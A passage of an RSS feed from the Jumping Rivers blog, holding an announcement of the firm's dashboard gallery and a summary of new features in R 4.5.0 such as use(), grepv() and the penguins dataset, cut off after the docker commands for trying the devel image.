For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-testing-advanced/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Announcing the Jumping Rivers Dashboard Gallery</title><link>https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/</link><pubDate>Tue, 15 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;em&gt;Jumping Rivers&lt;/em&gt; we love data dashboards and are delighted to announce the release of a
&lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;gallery&lt;/a&gt; to showcase our application-development
skills.&lt;/p&gt;
&lt;p&gt;Tools like
&lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt;,
&lt;a href="https://dash.plotly.com/" rel="external"&gt;Dash&lt;/a&gt;,
&lt;a href="https://streamlit.io/" rel="external"&gt;Streamlit&lt;/a&gt; and
&lt;a href="https://observablehq.com/" rel="external"&gt;Observable&lt;/a&gt; have simplified the process of making interactive, visual,
data products.&lt;/p&gt;
&lt;p&gt;Despite this simplification, our clients often approach us with challenges that step beyond what is
easily achieved in these dashboard frameworks. They may have
&lt;a href="https://www.jumpingrivers.com/tags/accessibility/" rel="external"&gt;&lt;em&gt;accessibility&lt;/em&gt;&lt;/a&gt; requirements, or need
applications to be &lt;em&gt;responsive&lt;/em&gt; to a users browser size or device. They may need a user interface
that matches their &lt;em&gt;branding&lt;/em&gt;, or that is easy to use. Data itself is sometimes a challenge, and
some clients need a
&lt;a href="https://www.jumpingrivers.com/tags/who/" rel="external"&gt;&lt;em&gt;data pipeline&lt;/em&gt;&lt;/a&gt; developing, for pre-processing or
validation, so that their applications can work more effectively. There are niche skills involved in
&lt;em&gt;data presentation and visualisation&lt;/em&gt;, and we have a wealth of experience with charts, tables, maps
and have built a range of &lt;em&gt;custom data-widgets&lt;/em&gt; for clients.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-shiny-dashboard-app-gallery"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Our &lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt; contains several
applications that highlight our expertise across the &lt;em&gt;Jumping Rivers&lt;/em&gt; data science team. Within it,
you can find a list of the applications that are available to view, with links to each and some
technical information. All the applications are publicly accessible. In the coming months we will be
adding further applications to the gallery.&lt;/p&gt;
&lt;p&gt;At &lt;em&gt;Jumping Rivers&lt;/em&gt; we have worked with
&lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt; for many years (including Shiny for Python), and have several
&lt;a href="https://www.jumpingrivers.com/training/all-courses/?search=shiny"&gt;training courses&lt;/a&gt;, dozens of
&lt;a href="https://www.jumpingrivers.com/blog/?search=shiny"&gt;blog posts&lt;/a&gt; and host our annual conference
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;&amp;ldquo;Shiny in Production&amp;rdquo;&lt;/a&gt; on this tool. Consequently,
many of the gallery applications are built using Shiny. But our team also boasts expertise with the
data visualisation library
&lt;a href="https://d3js.org/" rel="external"&gt;D3.js&lt;/a&gt; and a range of JavaScript frameworks, and so there is a
&lt;a href="https://vuejs.org/" rel="external"&gt;Vue.js&lt;/a&gt; application and a timeline developed in D3 presented within the
showcase too.&lt;/p&gt;
&lt;p&gt;Included in our initial gallery collection are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Litmus dashboard&lt;/a&gt; which displays risk- and
quality-scores for use when validating R packages (see our recent
&lt;a href="https://www.jumpingrivers.com/blog/litmus-dashboard/" rel="external"&gt;blog post&lt;/a&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/litmus.png" alt="A dashboard showing quality statistics about R packages"
style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a &lt;a href="https://gallery-icbmap.jmpr.io" rel="external"&gt;map application&lt;/a&gt; displaying the
&amp;ldquo;Integrated Care Board&amp;rdquo; boundaries and population sizes for NHS England;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/icb.png" alt="A map showing the 'Integrated Care Board' boundaries for NHS
England" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a &lt;a href="https://jumpingrivers.com/misc/timeline/" rel="external"&gt;timeline&lt;/a&gt; showing the history of the R language,
built with D3.js;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/r-timeline.png" alt="Part of a timeline about the history of the R language"
style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a fun &lt;a href="https://gallery-cats.jmpr.io" rel="external"&gt;quiz&lt;/a&gt; to determine which cat
you are;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/cats.png" alt="The front page of a quiz that determines what type of cat you
are" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;an &lt;a href="https://jumpingrivers.com/misc/jfk-departures" rel="external"&gt;airport departure-board&lt;/a&gt; with
interactively-selectable columns.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/departures.png" alt="A dashboard displaying departure times in the style of
an airport departure screen" style="display: block; margin: auto"&gt;&lt;/p&gt;
&lt;p&gt;Please explore our &lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt;, and if you
or your team have a project that would
benefit from our expertise in dashboard development, deployment and the underlying infrastructure
please &lt;a href="https://jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.5.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r45/</link><pubDate>Thu, 10 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r45/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r45/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r45/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R 4.5.0 (“How About a Twenty-Six”) was released on 11th April, 2025.
Here we summarise some of the interesting changes that have been
introduced. In previous blog posts we have discussed the new features
introduced in &lt;a href="https://www.jumpingrivers.com/blog/whats-new-r44/" rel="external"&gt;R
4.4.0&lt;/a&gt; and earlier
versions (see the links at the end of this post).&lt;/p&gt;
&lt;p&gt;The full changelog can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;r-release ‘NEWS’
page&lt;/a&gt; and if
you want to keep up to date with developments in base R, have a look at
the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;r-devel ‘NEWS’
page&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-whats-new-r45"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="penguins"&gt;penguins&lt;/h2&gt;
&lt;p&gt;Who doesn’t love a new dataset?&lt;/p&gt;
&lt;p&gt;One of the great things about learning R for data science is that there
are a collection of datasets available to work with, built into the base
installation of R. The Palmer Penguins dataset has been available via an
&lt;a href="https://cran.r-project.org/web/packages/palmerpenguins/readme/README.html" rel="external"&gt;external
package&lt;/a&gt;
since 2020, and has been added to R v4.5.0 as a base dataset.&lt;/p&gt;
&lt;p&gt;This dataset is useful for clustering and classification tasks and was
originally highlighted as an alternative to the &lt;code&gt;iris&lt;/code&gt; dataset.&lt;/p&gt;
&lt;p&gt;In addition to the &lt;code&gt;penguins&lt;/code&gt; dataset, there is a related &lt;code&gt;penguins_raw&lt;/code&gt;
dataset. This may prove useful when teaching or learning data cleaning.&lt;/p&gt;
&lt;h2 id="use"&gt;&lt;code&gt;use()&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;If you have worked in languages other than R, its approach to importing
code from packages may seem strange. In a Python module, you would
either import a package and then use functions from within the explicit
namespace for the package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numpy&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;array([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([1, 2, 3])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or you would import a specific function by name, prior to its use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; array
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;array([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([1, 2, 3])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In an R script, we either use explicitly-namespaced functions (without
loading the containing package):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or we load a package, adding all its exported functions to our
namespace, and then use the specific functions we need:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The latter form can cause some confusion. If you load multiple packages,
there may be naming conflicts between the exported functions. Indeed,
there is a &lt;code&gt;filter()&lt;/code&gt; function in the base package &lt;code&gt;{stats}&lt;/code&gt; that is
overridden when we load &lt;code&gt;{dplyr}&lt;/code&gt; - so the behaviour of &lt;code&gt;filter()&lt;/code&gt;
differs before and after loading &lt;code&gt;{dplyr}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;R 4.5.0 introduces a new way to load objects from a package: &lt;code&gt;use()&lt;/code&gt;.
This allows us to be more precise about which functions we load, and
from where:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.5.0 (New session)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;filter&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Attaching package: ‘dplyr’&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The following object is masked from ‘package:stats’:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# filter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(bill_len &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(species&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;bill_dep)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# species island bill_len bill_dep&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 Adelie Torgersen 40.3 18.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2 Adelie Torgersen 42.0 20.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 3 Adelie Torgersen 41.1 17.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 4 Adelie Torgersen 42.5 20.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 5 Adelie Torgersen 46.0 21.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 6 Adelie Biscoe 40.6 18.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that only those objects that we &lt;code&gt;use()&lt;/code&gt; get imported from the
package:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# R 4.5.0 (Session continued)
n_distinct(penguins)
# Error in n_distinct(penguins) : could not find function &amp;quot;n_distinct&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A feature similar to &lt;code&gt;use()&lt;/code&gt; has been available in the
&lt;a href="https://klmr.me/box/reference/use.html" rel="external"&gt;&lt;code&gt;{box}&lt;/code&gt;&lt;/a&gt; and
&lt;a href="https://cran.r-project.org/web/packages/import/vignettes/import.html" rel="external"&gt;&lt;code&gt;{import}&lt;/code&gt;&lt;/a&gt;
packages for a while. {box} is a particularly interesting project, as it
allows more fine-grained control over the import and export of objects
from specific code files.&lt;/p&gt;
&lt;h2 id="parallel-downloads"&gt;Parallel downloads&lt;/h2&gt;
&lt;p&gt;Historically, the &lt;code&gt;install.packages()&lt;/code&gt; function worked sequentially -
both the downloading and installing of packages was performed one at a
time. This means it could be slow to install many packages.&lt;/p&gt;
&lt;p&gt;We often recommend the
&lt;a href="https://pak.r-lib.org/reference/features.html" rel="external"&gt;&lt;code&gt;{pak}&lt;/code&gt;&lt;/a&gt; package for
installing packages because it can download and install packages in
parallel.&lt;/p&gt;
&lt;p&gt;But as of R 4.5.0, &lt;code&gt;install.packages()&lt;/code&gt; (and the related
&lt;code&gt;download.packages()&lt;/code&gt; and &lt;code&gt;update.packages()&lt;/code&gt;) are capable of
downloading packages in parallel. This may speed up the whole
download-and-install process. As described in a post on the &lt;a href="https://blog.r-project.org/2024/12/02/faster-downloads/" rel="external"&gt;R-project
blog&lt;/a&gt; by Tomas
Kalibera, the typical speed-up expected is around 2-5x (although this is
highly variable).&lt;/p&gt;
&lt;h2 id="c23"&gt;C23&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://en.cppreference.com/w/c/23" rel="external"&gt;C23&lt;/a&gt; is the current standard for
the C language. Much of base R and many R packages require compilation
from C. If a C23 compiler is available on your machine, R will now
preferentially use that.&lt;/p&gt;
&lt;h2 id="grepv"&gt;grepv()&lt;/h2&gt;
&lt;p&gt;For pattern matching in base R, &lt;code&gt;grep()&lt;/code&gt; and related functions are the
main tools. By default, &lt;code&gt;grep()&lt;/code&gt; returns the index of any entry in a
vector that matches some pattern.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 7 8 29 30 39 40 69 70 121 122 131 132 139 140 163 164 193 194 199&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [20] 200 271 272 277 278 293 294 299 300 301 302 303 304 315 316 341 342&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have been able to extract the values of the input vector, rather than
the indices, by specifying &lt;code&gt;value = TRUE&lt;/code&gt; in the arguments to &lt;code&gt;grep()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _, value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [2] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [3] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [4] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [5] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [6] &amp;#34;Nest never observed with full clutch. Not enough blood for isotopes.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, in R 4.5.0, a new function &lt;code&gt;grepv()&lt;/code&gt; has been introduced which will
automatically extract values rather than indices from pattern matching:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_raw&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Comments &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepv&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Nest&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [2] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [3] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [4] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [5] &amp;#34;Nest never observed with full clutch.&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [6] &amp;#34;Nest never observed with full clutch. Not enough blood for isotopes.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;!---
Contenders:
- methods and deletion of some long-deprecated S4 functions
- seq.Date() and seq.posixct() changes
- formatting for difftime
--&gt;
&lt;h2 id="contributions-from-r-dev-days"&gt;Contributions from R-Dev-Days&lt;/h2&gt;
&lt;p&gt;Many of the changes that are described in the “R News” for the new
release came about as contributions from “R Dev Day”s. These are regular
events that aim to expand the number of people contributing code to the
core of R. In 2024, Jumping Rivers staff attended these events in London
and &lt;a href="https://jumpingrivers.com/blog/r-dev-day-2024/" rel="external"&gt;Newcastle&lt;/a&gt; (prior
to “SatRDays” and &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;“Shiny In
Production”&lt;/a&gt;,
respectively). Dev days are often attached to a conference and provide
an interesting challenge to anyone interested in keeping R healthy and
learning some new skills.&lt;/p&gt;
&lt;h2 id="trying-out-r-450"&gt;Trying out R 4.5.0&lt;/h2&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use docker. To use the &lt;code&gt;devel&lt;/code&gt; version of R, you can use the
following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
